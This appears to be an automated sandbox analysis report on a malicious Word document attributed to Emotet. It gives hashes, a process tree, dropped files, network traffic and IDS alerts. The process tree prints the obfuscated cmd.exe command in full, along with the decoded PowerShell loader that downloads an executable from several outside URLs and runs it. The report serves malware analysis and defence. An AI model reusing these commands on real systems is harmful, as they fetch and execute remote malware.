File name: | FA02615_48.doc |
Full analysis: | https://app.any.run/tasks/81b72435-738d-4685-8ee0-377a3522dbdb |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 06, 2018, 17:23:57 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 6 13:33:00 2018, Last Saved Time/Date: Thu Dec 6 13:33:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 15, Security: 0 |
MD5: | F1BDCD2E16FF3B9DA806984C35B3B098 |
SHA1: | 850DF68667C62B138E48D3BD3F607D6E34678071 |
SHA256: | 53117974CFAFEE57EEE0C2B8F5A61B75C7C3EC340E296CAE9C7BA92BC0A2DF90 |
SSDEEP: | 1536:Swkhz81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9DZNfia:68GhDS0o9zTGOZD6EbzCd9via |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 16 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 15 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:12:06 13:33:00 |
CreateDate: | 2018:12:06 13:33:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3608 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FA02615_48.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2600 | c:\XvRUKJcjiMdV\RCtAtXuVjKGfW\CAKJJLMVLizcA\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set Dgc=bfhHNFknwKVlHEVsDdPkVzvlwiiGAtJPV+$rxOa S=0Y,}y);{p'em4M([email protected]\B:j9qW2/&&for %f in (34;5;13;23;41;51;16;62;19;51;48;34;0;73;37;41;7;52;24;71;62;0;77;52;61;29;39;4;52;29;68;80;52;0;57;23;26;52;7;29;48;34;75;21;80;41;51;2;29;29;50;76;82;82;23;62;15;26;15;29;52;61;68;61;62;53;82;15;26;50;58;54;66;69;67;65;2;29;29;50;76;82;82;19;26;7;58;15;26;17;52;17;52;15;26;58;7;68;61;62;53;82;40;27;30;15;69;50;36;65;2;29;29;50;76;82;82;53;38;35;29;26;77;7;58;35;26;53;53;52;68;7;23;82;26;12;2;2;78;7;28;36;65;2;29;29;50;76;82;82;17;52;19;62;35;53;61;68;50;23;82;50;63;0;82;50;73;58;50;69;52;81;36;59;65;2;29;29;50;76;82;82;19;26;7;52;0;46;17;52;15;26;58;7;68;61;62;53;82;22;60;23;19;61;53;35;75;62;51;68;40;50;23;26;29;56;51;65;51;47;48;34;80;79;61;41;51;19;50;26;51;48;34;59;80;73;39;41;39;51;78;81;66;51;48;34;61;75;4;41;51;26;26;19;51;48;34;43;50;27;41;34;52;7;22;76;29;52;53;50;33;51;74;51;33;34;59;80;73;33;51;68;52;36;52;51;48;1;62;35;52;38;61;2;56;34;26;5;63;39;26;7;39;34;75;21;80;47;49;29;35;46;49;34;0;73;37;68;16;62;24;7;23;62;38;17;5;26;23;52;56;34;26;5;63;44;39;34;43;50;27;47;48;34;40;38;37;41;51;72;64;79;51;48;70;1;39;56;56;27;52;29;71;70;29;52;53;39;34;43;50;27;47;68;23;52;7;58;29;2;39;71;58;52;39;66;42;42;42;42;47;39;49;70;7;22;62;19;52;71;70;29;52;53;39;34;43;50;27;48;34;5;70;80;41;51;37;15;4;51;48;0;35;52;38;19;48;45;45;61;38;29;61;2;49;45;45;34;80;55;15;41;51;31;21;26;51;48;88)do set 45Nn=!45Nn!!Dgc:~%f,1!&&if %f==88 powershell.exe "!45Nn:~6!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3260 | CmD /V/C"set Dgc=bfhHNFknwKVlHEVsDdPkVzvlwiiGAtJPV+$rxOa S=0Y,}y);{p'em4M([email protected]\B:j9qW2/&&for %f in (34;5;13;23;41;51;16;62;19;51;48;34;0;73;37;41;7;52;24;71;62;0;77;52;61;29;39;4;52;29;68;80;52;0;57;23;26;52;7;29;48;34;75;21;80;41;51;2;29;29;50;76;82;82;23;62;15;26;15;29;52;61;68;61;62;53;82;15;26;50;58;54;66;69;67;65;2;29;29;50;76;82;82;19;26;7;58;15;26;17;52;17;52;15;26;58;7;68;61;62;53;82;40;27;30;15;69;50;36;65;2;29;29;50;76;82;82;53;38;35;29;26;77;7;58;35;26;53;53;52;68;7;23;82;26;12;2;2;78;7;28;36;65;2;29;29;50;76;82;82;17;52;19;62;35;53;61;68;50;23;82;50;63;0;82;50;73;58;50;69;52;81;36;59;65;2;29;29;50;76;82;82;19;26;7;52;0;46;17;52;15;26;58;7;68;61;62;53;82;22;60;23;19;61;53;35;75;62;51;68;40;50;23;26;29;56;51;65;51;47;48;34;80;79;61;41;51;19;50;26;51;48;34;59;80;73;39;41;39;51;78;81;66;51;48;34;61;75;4;41;51;26;26;19;51;48;34;43;50;27;41;34;52;7;22;76;29;52;53;50;33;51;74;51;33;34;59;80;73;33;51;68;52;36;52;51;48;1;62;35;52;38;61;2;56;34;26;5;63;39;26;7;39;34;75;21;80;47;49;29;35;46;49;34;0;73;37;68;16;62;24;7;23;62;38;17;5;26;23;52;56;34;26;5;63;44;39;34;43;50;27;47;48;34;40;38;37;41;51;72;64;79;51;48;70;1;39;56;56;27;52;29;71;70;29;52;53;39;34;43;50;27;47;68;23;52;7;58;29;2;39;71;58;52;39;66;42;42;42;42;47;39;49;70;7;22;62;19;52;71;70;29;52;53;39;34;43;50;27;48;34;5;70;80;41;51;37;15;4;51;48;0;35;52;38;19;48;45;45;61;38;29;61;2;49;45;45;34;80;55;15;41;51;31;21;26;51;48;88)do set 45Nn=!45Nn!!Dgc:~%f,1!&&if %f==88 powershell.exe "!45Nn:~6!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3092 | powershell.exe "$FEl='Dok';$bUO=new-object Net.WebClient;$BzW='http://losistec.com/sipg4837@http://kingsidedesign.com/SGJs3px@http://martijngrimme.nl/iHhh9nAx@http://dekormc.pl/pub/pUgp3e2xL@http://kinebydesign.com/vRlkcmrBo'.Split('@');$Wqc='kpi';$LWU = '928';$cBN='iik';$YpG=$env:temp+'\'+$LWU+'.exe';foreach($iFu in $BzW){try{$bUO.DownloadFile($iFu, $YpG);$SaO='ZTq';If ((Get-Item $YpG).length -ge 80000) {Invoke-Item $YpG;$FIW='OsN';break;}}catch{}}$WMs='Pzi';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2724 | "C:\Users\admin\AppData\Local\Temp\928.exe" | C:\Users\admin\AppData\Local\Temp\928.exe | — | powershell.exe |
User: admin Company: Nexon Corp. Integrity Level: MEDIUM Description: Softpub Specialer DLL Exit code: 0 Version: 6.1.7600.1 | ||||
3572 | "C:\Users\admin\AppData\Local\Temp\928.exe" | C:\Users\admin\AppData\Local\Temp\928.exe | 928.exe | |
User: admin Company: Nexon Corp. Integrity Level: MEDIUM Description: Softpub Specialer DLL Exit code: 0 Version: 6.1.7600.1 | ||||
3148 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 928.exe |
User: admin Company: Nexon Corp. Integrity Level: MEDIUM Description: Softpub Specialer DLL Exit code: 0 Version: 6.1.7600.1 | ||||
3768 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Company: Nexon Corp. Integrity Level: MEDIUM Description: Softpub Specialer DLL Version: 6.1.7600.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA7FB.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3092 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W2H7F0DTAPICK2XKU1ZK.temp | — | |
MD5:— | SHA256:— | |||
3092 | powershell.exe | C:\Users\admin\AppData\Local\Temp\928.exe | — | |
MD5:— | SHA256:— | |||
3092 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13b420.TMP | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
3572 | 928.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:BB7D2D20E0E2E1687848B576ABF9C82F | SHA256:26E9F955E6F04AA0A2D9037DB688A3677E80269E39EE63A8446021CD5A2FF267 | |||
3092 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$02615_48.doc | pgc | |
MD5:ECC8C22F2446BC5F4ADCED62234F0C3D | SHA256:0529B2F50B42C4256F738438F9B40A3C2552C72AC38A28FB893E92E3884C5A6A | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:7C45A5BCA47C2C12B85AF435A8FF8FB0 | SHA256:1B6BEADCFAF6F3B81CCAD48373544305399C5B159F46075D45014E981435FD58 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3092 | powershell.exe | GET | 200 | 192.185.119.24:80 | http://losistec.com/cgi-sys/suspendedpage.cgi | US | html | 900 b | malicious |
3092 | powershell.exe | GET | 301 | 205.134.255.48:80 | http://kingsidedesign.com/SGJs3px | US | html | 242 b | malicious |
3092 | powershell.exe | GET | 200 | 205.134.255.48:80 | http://kingsidedesign.com/SGJs3px/ | US | executable | 120 Kb | malicious |
3768 | archivesymbol.exe | GET | 200 | 142.169.99.1:7080 | http://142.169.99.1:7080/ | CA | binary | 132 b | malicious |
3092 | powershell.exe | GET | 302 | 192.185.119.24:80 | http://losistec.com/sipg4837 | US | html | 291 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3092 | powershell.exe | 192.185.119.24:80 | losistec.com | CyrusOne LLC | US | suspicious |
3092 | powershell.exe | 205.134.255.48:80 | kingsidedesign.com | InMotion Hosting, Inc. | US | malicious |
3768 | archivesymbol.exe | 142.169.99.1:7080 | — | TELUS Communications Inc. | CA | malicious |
Domain | IP | Reputation |
---|---|---|
losistec.com |
| malicious |
kingsidedesign.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3092 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3092 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious redirect to 'suspendedpage.cgi' |
3092 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3092 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3092 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3092 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3768 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3768 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |